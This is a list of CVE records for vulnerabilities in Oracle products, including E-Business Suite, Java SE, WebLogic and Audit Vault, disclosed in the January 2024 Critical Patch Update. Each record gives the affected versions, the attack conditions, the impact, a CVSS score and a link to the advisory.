CVE    2024    20941    Candidate    Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: HTML UI). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20940    Candidate    Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Create, Update, Authoring Flow). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20939    Candidate    Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Admin Console). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20938    Candidate    Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: ECC). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20937    Candidate    Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics SEC). Supported versions that are affected are Prior to 9.2.8.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20936    Candidate    Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Documents). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data as well as unauthorized read access to a subset of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20935    Candidate    Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: Engineering Change Order). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20932    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20931    Candidate    Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20930    Candidate    Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Content Access SDK, Image Export SDK, PDF Export SDK, HTML Export SDK). The supported version that is affected is 8.5.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Outside In Technology accessible data as well as unauthorized read access to a subset of Oracle Outside In Technology accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Outside In Technology. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20929    Candidate    Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: DB Privileges). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data as well as unauthorized read access to a subset of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20928    Candidate    Vulnerability in the Oracle WebCenter Content product of Oracle Fusion Middleware (component: Content Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20927    Candidate    Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 8.6 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20926    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3728-1] openjdk-11 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html    Assigned (20231207)
CVE    2024    20925    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20924    Candidate    Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Audit Vault and Database Firewall. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20923    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20922    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20921    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20920    Candidate    Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20919    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20918    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3728-1] openjdk-11 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html    Assigned (20231207)
CVE    2024    20917    Candidate    Vulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Log Management). The supported version that is affected is 13.5.0.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Manager Base Platform. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20916    Candidate    Vulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Event Management). The supported version that is affected is 13.5.0.0. Easily exploitable vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the Oracle Enterprise Manager Base Platform executes to compromise Oracle Enterprise Manager Base Platform. While the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20915    Candidate    Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Login - SSO). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Application Object Library. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20914    Candidate    Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 2.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20913    Candidate    Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: BI Platform Security). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20912    Candidate    Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Easily exploitable vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20911    Candidate    Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20910    Candidate    Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. While the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 3.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20909    Candidate    Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20908    Candidate    Vulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced UI). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20907    Candidate    Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: File download). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Web Applications Desktop Integrator, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Web Applications Desktop Integrator accessible data as well as unauthorized read access to a subset of Oracle Web Applications Desktop Integrator accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20906    Candidate    Vulnerability in the Integrated Lights Out Manager (ILOM) product of Oracle Systems (component: System Management). Supported versions that are affected are 3, 4 and 5. Easily exploitable vulnerability allows high privileged attacker with network access via ICMP to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized read access to a subset of Integrated Lights Out Manager (ILOM) accessible data. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
